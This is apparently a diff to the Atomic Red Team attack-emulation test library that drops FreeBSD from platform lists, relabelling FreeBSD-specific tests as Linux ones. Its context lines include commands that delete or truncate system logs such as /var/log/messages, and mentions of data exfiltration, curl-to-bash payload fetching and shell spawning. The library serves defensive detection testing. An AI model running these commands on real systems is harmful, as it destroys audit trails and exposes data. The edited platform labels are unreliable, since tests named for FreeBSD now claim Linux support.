**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24
|
||||
|
||||
@@ -8,7 +8,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
|
||||
@@ -85,7 +85,7 @@ rm -rf /tmp/atomic-test-T1036.006
|
||||
## Atomic Test #3 - Space After Filename (FreeBSD)
|
||||
Space after filename.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8
|
||||
|
||||
@@ -38,7 +38,7 @@ atomic_tests:
|
||||
description: |
|
||||
Space after filename.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: |
|
||||
|
||||
@@ -126,7 +126,7 @@ origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /et
|
||||
## Atomic Test #4 - rc.local (FreeBSD)
|
||||
Modify rc.local
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 2015fb48-8ab6-4fbf-928b-0b62de5c9476
|
||||
|
||||
@@ -59,7 +59,7 @@ atomic_tests:
|
||||
Modify rc.local
|
||||
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
|
||||
@@ -98,7 +98,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** c93f2492-9ebe-44b5-8b45-36574cccfe67
|
||||
@@ -463,7 +463,7 @@ cc #{csource_path} -o #{program_path}
|
||||
## Atomic Test #10 - Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** e2028771-1bfb-48f5-b5e6-e50ee0942a14
|
||||
@@ -514,7 +514,7 @@ cc #{csource_path} -o #{program_path}
|
||||
## Atomic Test #11 - Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** a3a0d4c9-c068-4563-a08d-583bd05b884c
|
||||
|
||||
@@ -35,7 +35,7 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -254,7 +254,7 @@ atomic_tests:
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
@@ -288,7 +288,7 @@ atomic_tests:
|
||||
description: |
|
||||
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
|
||||
@@ -142,7 +142,7 @@ Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f03d59dc-0e3b-428a-baeb-3499552c7048
|
||||
|
||||
@@ -69,13 +69,13 @@ atomic_tests:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan Nmap for FreeBSD
|
||||
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
|
||||
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
|
||||
@@ -77,7 +77,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
|
||||
## Atomic Test #2 - Exfiltrate data HTTPS using curl freebsd,linux or macos
|
||||
Exfiltrate data HTTPS using curl to file share site file.io
|
||||
|
||||
**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01
|
||||
|
||||
@@ -46,7 +46,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
|
||||
@@ -32,7 +32,7 @@ A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltra
|
||||
|
||||
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
|
||||
|
||||
**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
|
||||
@@ -104,7 +104,7 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
|
||||
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
|
||||
Exfiltration of specified file over DNS protocol.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
|
||||
@@ -358,7 +358,7 @@ if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sle
|
||||
## Atomic Test #9 - Python3 http.server (freebsd)
|
||||
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 57a303a2-0bc6-400d-b144-4f3292920a0b
|
||||
|
||||
@@ -10,7 +10,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
@@ -53,7 +52,6 @@ atomic_tests:
|
||||
description: |
|
||||
Exfiltration of specified file over DNS protocol.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
steps: |
|
||||
@@ -223,7 +221,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
|
||||
@@ -26,7 +26,7 @@ Remote to Local
|
||||
|
||||
Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
|
||||
|
||||
**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
|
||||
@@ -63,7 +63,7 @@ Local to Remote
|
||||
|
||||
Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
|
||||
|
||||
**Supported Platforms:** macOS, Linux, Freebsd
|
||||
**Supported Platforms:** macOS, Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268
|
||||
|
||||
@@ -12,7 +12,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -33,7 +32,6 @@ atomic_tests:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
|
||||
@@ -86,7 +86,7 @@ Get a listing of network connections.
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
|
||||
|
||||
@@ -34,7 +34,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
|
||||
@@ -108,7 +108,7 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
|
||||
## Atomic Test #3 - At - Schedule a job freebsd
|
||||
This test submits a command to be run in the future by the `at` daemon.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 549863fb-1c91-467e-97fc-1fa32b9f356b
|
||||
|
||||
@@ -60,7 +60,7 @@ atomic_tests:
|
||||
This test submits a command to be run in the future by the `at` daemon.
|
||||
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
|
||||
input_arguments:
|
||||
time_spec:
|
||||
|
||||
@@ -20,7 +20,7 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute
|
||||
## Atomic Test #1 - Cron - Replace crontab with referenced file
|
||||
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
|
||||
@@ -103,7 +103,7 @@ rm /etc/cron.weekly/#{cron_script_name}
|
||||
## Atomic Test #3 - Cron - Add script to /etc/cron.d folder
|
||||
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 078e69eb-d9fb-450e-b9d0-2e118217c846
|
||||
|
||||
@@ -6,9 +6,8 @@ atomic_tests:
|
||||
description: |
|
||||
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -59,7 +58,7 @@ atomic_tests:
|
||||
description: |
|
||||
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
|
||||
@@ -194,7 +194,7 @@ There are several variables that can be set to control the appearance of the bas
|
||||
|
||||
To gain persistence the command could be added to the users .shrc or .profile
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b04284dc-3bd9-4840-8d21-61b8d31c99f2
|
||||
@@ -243,7 +243,7 @@ When a command is executed in bash, the BASH_COMMAND variable contains that comm
|
||||
|
||||
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
|
||||
|
||||
@@ -95,7 +95,7 @@ atomic_tests:
|
||||
|
||||
To gain persistence the command could be added to the users .shrc or .profile
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: |
|
||||
@@ -121,7 +121,6 @@ atomic_tests:
|
||||
|
||||
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
|
||||
@@ -28,7 +28,7 @@ Utilize ps to identify processes.
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
|
||||
|
||||
@@ -8,7 +8,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
|
||||
@@ -48,7 +48,7 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
|
||||
## Atomic Test #1 - Create and Execute Bash Shell Script
|
||||
Creates and executes a simple sh script.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
|
||||
@@ -90,7 +90,7 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux, macOS
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
|
||||
@@ -225,7 +225,7 @@ curl --create-dirs #{linenum_url} --output #{linenum}
|
||||
## Atomic Test #5 - New script file in the tmp directory
|
||||
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
|
||||
@@ -260,7 +260,7 @@ unset TMPFILE
|
||||
## Atomic Test #6 - What shell is running
|
||||
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17
|
||||
@@ -290,7 +290,7 @@ if $(printenv SHELL >/dev/null); then printenv SHELL; fi
|
||||
## Atomic Test #7 - What shells are available
|
||||
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702
|
||||
@@ -318,7 +318,7 @@ cat /etc/shells
|
||||
## Atomic Test #8 - Command line scripts
|
||||
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a
|
||||
@@ -377,7 +377,7 @@ unset ART
|
||||
## Atomic Test #10 - Obfuscated command line scripts (freebsd)
|
||||
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
|
||||
@@ -455,7 +455,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
|
||||
## Atomic Test #12 - Change login shell (freebsd)
|
||||
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
|
||||
@@ -535,7 +535,7 @@ unset ART
|
||||
## Atomic Test #14 - Environment variable scripts (freebsd)
|
||||
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
|
||||
@@ -622,7 +622,7 @@ apt update && apt install -y curl
|
||||
## Atomic Test #16 - Detecting pipe-to-shell (freebsd)
|
||||
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Creates and executes a simple sh script.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -30,7 +29,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -105,7 +103,6 @@ atomic_tests:
|
||||
description: |
|
||||
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -122,7 +119,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -136,7 +132,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -148,7 +143,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -173,7 +167,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -210,7 +204,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: |
|
||||
chsh - change login shell, must be installed
|
||||
@@ -247,7 +241,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -293,7 +287,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
|
||||
@@ -20,7 +20,7 @@ Python comes with many built-in packages to interact with the underlying system,
|
||||
## Atomic Test #1 - Execute shell script via python's command mode arguement
|
||||
Download and execute shell script and write to file then execute locally using Python -c (command mode)
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
|
||||
@@ -74,7 +74,7 @@ pip install requests
|
||||
## Atomic Test #2 - Execute Python via scripts
|
||||
Create Python file (.py) that downloads and executes shell script via executor arguments
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
|
||||
@@ -139,7 +139,7 @@ pip install requests
|
||||
## Atomic Test #3 - Execute Python via Python executables
|
||||
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
|
||||
@@ -206,7 +206,7 @@ pip install requests
|
||||
## Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
|
||||
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
|
||||
|
||||
**Supported Platforms:** Freebsd, Linux
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 161d694c-b543-4434-85c3-c3a433e33792
|
||||
|
||||
@@ -5,7 +5,6 @@ atomic_tests:
|
||||
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
|
||||
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
script_url:
|
||||
@@ -43,7 +42,6 @@ atomic_tests:
|
||||
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
|
||||
description: Create Python file (.py) that downloads and executes shell script via executor arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -97,7 +95,6 @@ atomic_tests:
|
||||
description: |
|
||||
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -156,9 +153,8 @@ atomic_tests:
|
||||
description: |
|
||||
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
dependencies:
|
||||
- description: |
|
||||
Verify if python is in the environment variable path and attempt to import requests library.
|
||||
prereq_command: |
|
||||
|
||||
@@ -26,7 +26,7 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
|
||||
## Atomic Test #1 - Permission Groups Discovery (Local)
|
||||
Permission Groups Discovery
|
||||
|
||||
**Supported Platforms:** Freebsd, macOS, Linux
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
|
||||
|
||||
@@ -6,9 +6,8 @@ atomic_tests:
|
||||
description: |
|
||||
Permission Groups Discovery
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
|
||||
@@ -107,7 +107,7 @@ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
|
||||
## Atomic Test #2 - rm -rf
|
||||
Delete messages and security logs
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** bd8ccc45-d632-481e-b7cf-c467627d68f9
|
||||
@@ -211,7 +211,7 @@ touch #{system_log_path}
|
||||
## Atomic Test #5 - Truncate system log files via truncate utility (freebsd)
|
||||
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 14033063-ee04-4eaf-8f5d-ba07ca7a097c
|
||||
@@ -286,7 +286,7 @@ touch #{system_log_path}
|
||||
## Atomic Test #7 - Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
|
||||
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 369878c6-fb04-48d6-8fc2-da9d97b3e054
|
||||
@@ -397,7 +397,7 @@ sudo echo '' > #{system_log_path}
|
||||
## Atomic Test #10 - Overwrite FreeBSD system log via echo utility
|
||||
This test overwrites the contents of system log file with an empty string using echo utility
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 11cb8ee1-97fb-4960-8587-69b8388ee9d9
|
||||
@@ -498,7 +498,7 @@ touch #{system_log_path}
|
||||
## Atomic Test #13 - Delete system log files via unlink utility (freebsd)
|
||||
This test deletes the messages log file using unlink utility
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
|
||||
|
||||
@@ -37,7 +37,7 @@ atomic_tests:
|
||||
description: |
|
||||
Delete messages and security logs
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
rm -rf /var/log/messages
|
||||
@@ -86,7 +86,7 @@ atomic_tests:
|
||||
description: |
|
||||
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
truncate -s 0 /var/log/messages #size parameter shorthand
|
||||
@@ -124,7 +124,7 @@ atomic_tests:
|
||||
description: |
|
||||
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
cat /dev/null > /var/log/messages #truncating the file to zero bytes
|
||||
@@ -187,7 +187,7 @@ atomic_tests:
|
||||
